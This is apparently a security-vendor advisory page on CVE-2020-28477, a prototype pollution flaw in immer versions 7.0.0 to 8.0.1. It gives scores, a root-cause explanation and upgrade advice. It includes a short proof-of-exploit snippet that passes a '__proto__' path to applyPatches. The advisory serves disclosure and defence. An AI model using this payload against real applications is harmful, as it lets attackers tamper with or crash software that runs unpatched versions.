7.5

CVSS Score

3.1

Basic Information

CVE ID

CVE-2020-28477

GHSA ID

GHSA-9qmh-276g-x5pj

EPSS Score

0.70542%

CWE

CWE-471

Published

1/20/2021

Updated

4/25/2024

KEV Status

Technology

JavaScript

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2020-28477

CVE-2020-28477: Prototype Pollution in immer

Overview

Affected versions of immer are vulnerable to Prototype Pollution.

Proof of exploit

const {applyPatches, enablePatches} = require("immer");
enablePatches();
let obj = {};
console.log("Before : " + obj.polluted);
applyPatches({}, [ { op: 'add', path: [ "__proto__", "polluted" ], value: "yes" } ]);
// applyPatches({}, [ { op: 'replace', path: [ "__proto__", "polluted" ], value: "yes" } ]);
console.log("After : " + obj.polluted);

Remediation

Version 8.0.1 contains a fix for this vulnerability, updating is recommended.

(GitHub Advisory)

7.5

CVSS Score

3.1

Basic Information

CVE ID

CVE-2020-28477

GHSA ID

GHSA-9qmh-276g-x5pj

EPSS Score

0.70542%

CWE

CWE-471

Published

1/20/2021

Updated

4/25/2024

KEV Status

Technology

JavaScript

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
immer	npm	>= 7.0.0, < 8.0.1	8.0.1

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability manifests in the path traversal logic within applyPatches. Before the fix, the code did not validate if path segments like proto or prototype were being accessed. The proof of exploit demonstrates prototype pollution through add/replace operations using proto paths. The security fix in commit da2bd4f specifically adds validation checks in this path traversal loop to block manipulation of reserved properties, confirming this was the vulnerable code path.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

## Ov*rvi*w *****t** v*rsions o* imm*r *r* vuln*r**l* to Prototyp* Pollution. ## Proo* o* *xploit ```js *onst {*pplyP*t***s, *n**l*P*t***s} = r*quir*("imm*r"); *n**l*P*t***s(); l*t o*j = {}; *onsol*.lo*("***or* : " + o*j.pollut**); *pplyP*t***s({}

Reasoning

T** vuln*r**ility m*ni**sts in t** p*t* tr*v*rs*l lo*i* wit*in *pplyP*t***s. ***or* t** *ix, t** *o** *i* not v*li**t* i* p*t* s**m*nts lik* __proto__ or prototyp* w*r* **in* ****ss**. T** proo* o* *xploit **monstr*t*s prototyp* pollution t*rou** ***

7.5

Basic Information

Concerned about an active attack path?

CVE-2020-28477: Prototype Pollution in immer

Overview

Proof of exploit

Remediation

7.5

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI